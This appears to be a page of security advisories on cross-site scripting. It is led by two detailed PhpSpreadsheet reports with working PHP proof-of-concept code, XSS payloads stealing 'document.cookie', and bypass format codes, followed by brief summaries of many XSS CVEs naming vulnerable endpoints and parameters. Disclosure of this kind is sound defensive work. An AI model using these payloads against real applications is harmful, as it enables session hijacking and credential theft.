It was discovered that there is a way to bypass HTML escaping in the HTML writer using custom number format codes. ## The Problem In `Writer/Html.php` around line 1592, the code checks if the formatted cell data equals the original data to decide whether to apply `htmlspecialchars()`: ```php if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, ...); } ``` When a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**. Even a single trailing space in the format (`@ `) is enough to bypass the escape. ## Proof of Concept ```php use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; use PhpOffice\PhpSpreadsheet\Cell\DataType; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // XSS payload with malicious number format $sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @'); $writer = new Html($spreadsheet); $writer->save('output.html'); ``` The generated HTML contains: ```html <td>. <img src=x onerror=alert(document.cookie)></td> ``` The XSS payload is **completely unescaped**. ## Tested Bypass Formats | Format Code | Result | Escaped? | |---|---|---| | `General` (default) | Original value | YES (safe) | | `. @` | `. ` + value | **NO (XSS!)** | | `@ ` (trailing space) | value + ` ` | **NO (XSS!)** | | `x@` | `x` + value | **NO (XSS!)** | This was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser. ## Impact Any application that: 1. Accepts uploaded XLSX files from users 2. Converts them to HTML using PhpSpreadsheet's HTML writer 3. Displays the HTML to other users ...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`. ## Suggested Fix Always apply `htmlspecialchars()` regardless of whether formatting changed the value: ```php // Instead of conditional escaping: $cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ``` Or escape AFTER formatting, not conditionally based on equality. ## Reporter Keyvan Hardani
### Summary The HTML Writer in PhpSpreadsheet bypasses `htmlspecialchars()` output escaping when a cell uses a custom number format containing the `@` text placeholder with additional literal text (e.g., `@ "items"` or `"Total: "@`). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file. ### Details #### 1. Conditional escaping in `Html.php:1586-1594` ```php $cellData = NumberFormat::toFormattedString( $origData2, $formatCode ?? NumberFormat::FORMAT_GENERAL, [$this, 'formatColor'] ); if ($cellData === $origData) { $cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags()); } ``` `htmlspecialchars()` is only called when `$cellData === $origData` (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely. #### 2. Early return in `Formatter.php:136-152` ```php if (preg_match(self::SECTION_SPLIT, $format) === 0 && preg_match(self::SYMBOL_AT, $formatx) === 1) { if (!str_contains($format, '"')) { return str_replace('@', /* raw value */, $format); } return str_replace(/* ... preg_replace with raw value ... */); } ``` When the format code contains `@` with additional literal text (e.g., `@ "items"`), the formatter substitutes the raw cell value into the format string and **returns early** - the `formatColor` callback (which would have applied `htmlspecialchars`) is never invoked. ### PoC **test.php** ``` php <?php require '/app/vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); $payload = '<img src=x onerror=alert(document.domain)>'; $formatCode = '@ "items"'; $sheet->setCellValue('A1', $payload); $sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode); $writer = new Html($spreadsheet); $html = $writer->generateHTMLAll(); file_put_contents('/app/output.html', $html); echo "HTML output saved to /app/output.html\n"; ``` The produced output contains unescaped data. ``` html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet" /> <title>Untitled Spreadsheet</title> <meta name="author" content="Unknown Creator" /> <meta name="title" content="Untitled Spreadsheet" /> <meta name="lastModifiedBy" content="Unknown Creator" /> <meta name="created" content="2026-04-02T16:34:44+00:00" /> <meta name="modified" content="2026-04-02T16:34:44+00:00" /> <style type="text/css"> [..SNIP..] </style> </head> <body> <div style='page: page0'> <table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'> <col class="col0" /> <tbody> <tr class="row0"> <td class="column0 style1 s"><img src=x onerror=alert(document.domain)> items</td> </tr> </tbody></table> </div> </body> </html> ``` <img width="719" height="716" alt="Screenshot 2026-04-02 at 18 45 53" src="https://github.com/user-attachments/assets/b758b063-a2d1-4e76-87bb-931eae81dbfe" /> ### Impact The impact changes based on the way the HTML is served. In case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.
A vulnerability was determined in SourceCodester Pizzafy Ecommerce System 1.0. This vulnerability affects the function save_user of the file /admin/ajax.php?action=save_user. Executing a manipulation of the argument Name can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.
A vulnerability was found in SourceCodester Pizzafy Ecommerce System 1.0. This affects the function save_order of the file /admin/ajax.php?action=save_order. Performing a manipulation of the argument first_name results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used.
A reflected Cross-Site Scripting (XSS) vulnerability in School Management System by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim's browsers via the unsanitized type parameter in register.php.
A vulnerability has been found in SourceCodester Pizzafy Ecommerce System 1.0. Affected by this issue is the function save_menu of the file /admin/ajax.php?action=save_menu. Such manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
Cross-site scripting (XSS) in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated high-privilege administrators to inject malicious scripts via the Name parameter in the /admin/index.php?page=save_settings endpoint, exploited when an admin visits a crafted link. The vulnerability requires high privilege level (admin) and user interaction (UI:P), limiting but not eliminating real-world risk in environments with untrusted admins or admin account compromise. Publicly available exploit code exists.
Cross-Site Scripting (XSS) via malicious SVG upload in FUEL CMS v1.5.2 and earlier allows low-privileged authenticated users to execute arbitrary JavaScript in the context of other users' browsers through the asset upload functionality. The vulnerability stems from inadequate sanitization of SVG file contents during upload, enabling attackers with valid credentials to craft weaponized SVG files that execute when viewed by administrators or other site visitors. No active exploitation in CISA KEV confirmed; CVSS 5.4 reflects moderate impact with user interaction requirement.
Reflected cross-site scripting in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to inject malicious scripts via the ID parameter in /index.php?page=product, requiring user interaction to trigger payload execution. CVSS 4.8 with public exploit code availability (E:P) indicates low immediate risk despite network accessibility, constrained by high privilege requirement (PR:H) and user interaction dependency (UI:P).
Stored cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers with high privileges to inject malicious scripts via the Name parameter in the supplier management function (/index.php?page=supplier), affecting users who view the poisoned supplier records. The vulnerability requires user interaction (clicking a malicious link) and has CVSS 4.8 with publicly available proof-of-concept code, though it is limited to high-privileged users (PR:H) and causes only integrity impact (VI:L) without confidentiality or availability compromise.
Stored cross-site scripting (XSS) in the Woostify WordPress plugin through version 2.5.0 allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript into pages via unsanitized href attributes in the bundled Lity.js lightbox library. The injected scripts execute in the browsers of any user visiting the compromised page, enabling account takeover, credential theft, and malware distribution. No public exploit code has been identified at the time of analysis, but the vulnerability requires only low complexity network access with authenticated credentials.
Stored XSS vulnerability in Check & Log Email WordPress plugin before version 2.0.13 allows authenticated users with low privileges to inject malicious scripts via improper email replacement handling when the email encoder setting is enabled. The vulnerability requires user interaction (UI:R) to execute, affecting confidentiality and integrity with cross-site scope. Publicly available exploit code exists but exploitation probability remains low (EPSS 0.05%, percentile 17%), indicating this is not a widely targeted vulnerability despite public awareness.
Stored or reflected cross-site scripting (XSS) in SourceCodester Safety Anger Pad 1.0 allows remote unauthenticated attackers to inject malicious scripts via the angerDisplay parameter, potentially compromising user sessions and stealing sensitive data. The vulnerability requires user interaction (UI:R per CVSS) but has publicly available exploit code and a moderate CVSS score of 4.3, making it a practical attack vector for credential harvesting or malware distribution.
Stored cross-site scripting in WPC Smart Messages for WooCommerce plugin through version 4.2.8 allows authenticated attackers with contributor-level access to inject arbitrary JavaScript via the 'text' attribute of the wpcsm_text_rotator shortcode, resulting in execution whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping. No active exploitation confirmed; patch available in version 4.2.9.
Stored Cross-Site Scripting in Social Post Embed plugin for WordPress up to version 2.0.1 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript into page content via the Threads embed handler due to insufficient input sanitization and output escaping. Injected scripts execute when any user views the affected page, enabling session hijacking, credential theft, or malware distribution from trusted WordPress sites. No public exploit code or active exploitation has been identified at the time of analysis.
Stored Cross-Site Scripting in Timeline Blocks for Gutenberg WordPress plugin through version 1.1.10 allows authenticated contributors and above to inject arbitrary JavaScript via the 'titleTag' attribute of the timeline-blocks/tb-timeline-blocks block, executing malicious scripts whenever any user views the affected page. The vulnerability stems from insufficient input sanitization and output escaping on user-supplied block attributes. Exploitation requires WordPress contributor-level access or higher and affects all versions up to 1.1.10.
Stored cross-site scripting (XSS) in code-projects Coaching Management System 1.0 allows authenticated remote attackers to inject malicious scripts via the Complaint parameter in the complaint form page (/cims/modules/student/complaint.php), affecting users who view injected content. CVSS 5.1 reflects low confidentiality impact and limited integrity impact requiring user interaction; publicly available exploit code exists, confirming practical exploitability.
Reflected cross-site scripting (XSS) in SourceCodester Pharmacy Sales and Inventory System 1.0 allows remote attackers to inject malicious scripts via manipulation of the ID parameter in the /index.php?page=types endpoint. User interaction is required for exploitation, and publicly available exploit code exists, though the vulnerability carries limited impact (integrity only, no confidentiality or availability compromise) with a CVSS score of 5.3.
Stored Cross-Site Scripting in HTMLy 3.1.1 allows authenticated users with content creation privileges to inject malicious JavaScript via the image upload endpoint (/add/content?type=image), executing arbitrary code in victim browsers with scope change (S:C) indicating potential account takeover or session hijacking. Public proof-of-concept exists (YouTube demonstration and GitHub writeup), though EPSS score remains low (2%, 4th percentile) and no active exploitation has been confirmed by CISA KEV. CVSS 8.9 reflects high confidentiality and integrity impact but requires victim interaction.
An authenticated attacker with permission to edit document content can store crafted HTML/JavaScript in a Document embed editable and cause script execution when the published page is rendered. This issue affects pimcore: v12.3.3.
A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter
A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/view.php via the doctype parameter
ProjeQtor versions 7.0 through 12.4.3 contain a stored cross-site scripting vulnerability in the file upload functionality where the checkValidFileName() function fails to restrict HTML and HTM file uploads. Authenticated attackers can upload HTML files containing arbitrary JavaScript through the image upload or attachment endpoints, and any user accessing the uploaded file URL will execute the embedded JavaScript in their browser.
Quick Facts
- Typical Severity
- MEDIUM
- Category
- web
- Total CVEs
- 38830